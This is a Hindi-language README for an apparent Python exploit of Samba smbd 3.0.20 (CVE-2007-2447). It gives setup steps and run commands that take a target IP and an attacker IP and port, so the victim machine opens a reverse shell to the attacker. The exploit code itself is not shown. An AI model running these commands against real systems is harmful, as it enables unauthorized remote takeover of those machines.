
Samba smbd 3.0.20 (CVE-2007-2447) के लिए Python शोषण जो तैयार SMB अनुरोधों के माध्यम से रिमोट कमांड निष्पादन और रिवर्स शेल को सक्षम करता है।
इस रिपॉजिटरी में Samba smbd 3.0.20 (CVE-2007-2447) के लिए एक शोषण है जो निर्मित SMB अनुरोधों के माध्यम से दूरस्थ कमांड निष्पादन की अनुमति देता है।
इस शोषण के लिए Python 3 और कुछ निर्भरताओं की आवश्यकता है। शोषण चलाने से पहले एक वर्चुअल वातावरण स्थापित करने की सिफारिश की जाती है।
रिपॉजिटरी को क्लोन करें:
git clone https://github.com/your-repo/CVE-2007-2447.git
cd CVE-2007-2447
Python वर्चुअल वातावरण बनाएँ:
python3 -m venv smb_env
source smb_env/bin/activate # Linux/macOS
(Windows उपयोगकर्ता इसका उपयोग करके सक्रिय कर सकते हैं: smb_env\Scripts\activate)
आवश्यक निर्भरताएँ स्थापित करें:
pip install -r requirements.txt
एक बार वर्चुअल वातावरण सेट हो जाने पर, आप निम्नलिखित सिंटैक्स का उपयोग करके शोषण निष्पादित कर सकते हैं:
python3 CVE-2007-2447.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>
python3 CVE-2007-2447.py -t 192.168.1.100 -a 192.168.1.50 -p 4444
-t / --target: लक्ष्य (पीड़ित) मशीन का IP पता।-a / --attacker: हमलावर के सुनने वाले का IP पता।-p / --port: रिवर्स शेल कनेक्शन स्थापित करने के लिए पोर्ट।जब आप समाप्त कर लें, तो निम्नलिखित का उपयोग करके वर्चुअल वातावरण को निष्क्रिय करें:
deactivate